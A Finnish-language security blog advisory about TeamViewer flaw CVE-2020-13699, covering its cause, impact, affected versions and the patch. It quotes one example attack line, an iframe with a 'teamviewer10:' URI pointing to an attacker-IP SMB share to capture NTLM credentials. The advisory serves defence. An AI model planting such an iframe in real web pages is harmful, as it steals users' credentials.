TeamViewerin korkean riskin haavoittuvuutta voidaan hyödyntää käyttäjien salasanojen murtamiseen – SecPod Blog
Windowsin TeamViewerista löytyi korkean riskin haavoittuvuus. Sitä seurataan nimellä ”CVE-2020-13699”, ja sen CVSS-peruspistemäärä on ”8.8”, jota etähyökkääjät voisivat käyttää hyväksi murtaakseen käyttäjien salasanan ja sen jälkeen johtaa järjestelmän jatkohyödyntämiseen.
TeamViewer on saksalaisen TeamViewer GmbH:n kehittämä ohjelmistosovellus etähallintaan, työpöydän jakamiseen, verkkokokouksiin, verkkoneuvotteluihin ja tiedostojen siirtoon tietokoneiden välillä. TeamViewer on saatavilla Microsoft Windows-, Linux-, macOS-, Chrome OS-, Android-, iOS-, Windows RT-, Windows Phone 8- ja BlackBerry-käyttöjärjestelmille. TeamVieweria käyttävään järjestelmään on mahdollista päästä käsiksi myös verkkoselaimella.
Etäyhteysohjelmistosovellusten käytön viimeaikainen lisääntyminen johtuu viimeaikaisesta COVID-19-pandemian aiheuttamasta kotoa käsin työskentelykulttuurin muutoksesta.
(CVE-2020-13699) Haavoittuvuuden yksityiskohdat:
- CVE-2020-13699 on tietoturvaloukkaus, joka juontaa juurensa lainaamattomasta hakupolusta tai -elementistä. Erityisesti tämä haavoittuvuus johtuu siitä, että sovellus ei lainaa oikein mukautettuja URI-käsittelijöitään.
- Käyttäjä, jolla on asennettuna haavoittuva TeamViewer-versio, huijataan vierailemaan pahantahtoisesti muotoillulla verkkosivustolla tämän haavoittuvuuden hyödyntämiseksi.
- Haavoittuvuuden löytäneen ja julkistaneen Praetorianin tietoturva-insinöörin Jeffrey Hofmannin mukaan ”Hyökkääjä voi upottaa haitallisen iframe-kehyksen verkkosivustoon, jossa on muokattu URL-osoite (iframe src=’teamviewer10: -play \\\\attacker-IP\share\fake.tvs’), joka käynnistäisi TeamViewer Windows-työpöytäasiakkaan ja pakottaisi sen avaamaan etä-SMB-jako.”
- Windows suorittaa NTLM-todennuksen avatessaan SMB-jakoa. Tämä pyyntö voidaan välittää eli antaa hyökkääjälle mahdollisuuden kaapata todennus ja lähettää se toiselle palvelimelle, jolloin hän saa mahdollisuuden suorittaa operaatioita etäpalvelimella käyttäen todennetun käyttäjän oikeuksia.
- Tämän haavoittuvuuden onnistunut hyväksikäyttö voi antaa etähyökkääjälle mahdollisuuden käynnistää TeamViewer-ohjelman mielivaltaisilla parametreilla. Sovellus voitaisiin pakottaa välittämään NTLM-todennuspyyntö hyökkääjän järjestelmään, mikä mahdollistaisi offline-sateenkaaritauluhyökkäykset ja brute force -murtoyritykset.
- Nämä hyökkäykset voisivat johtaa lisähyökkäyksiin haavoittuvuuden onnistuneesta hyväksikäytöstä varastettujen tunnistetietojen vuoksi.
Paljastuksen mukaan tämän haavoittuvuuden hyväksikäytöstä ei ole todisteita.
CIS:n mukaan hyväksikäytön riski on suuri valtion laitoksilla ja keskisuurilla yrityksillä. Pienten yritysten kohdalla riski on keskisuuri ja kotikäyttäjien kohdalla pieni.
Vaikutus
Haavoittuvuuksien hyväksikäytön avulla etähyökkääjät voivat saada arkaluonteisia tunnistetietoja tai ottaa täydellisen hallinnan kyseisestä järjestelmästä.
Vaikutusalaan kuuluvat tuotteet
TeamViewer Windows-työpöytäsovellus ennen versiota 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 ja 15.8.3.
Ratkaisu
TeamViewer on julkaissut tietoturvapäivityksen, jolla korjataan haavoittuvuutta CVE-2020-13699.
SanerNow tietoturvasisältö, jolla tämä haavoittuvuus voidaan havaita ja sitä voidaan vähentää, on julkaistu. Suosittelemme vahvasti tietoturvapäivityksen soveltamista julkaistun tukiartikkelin ohjeiden mukaisesti.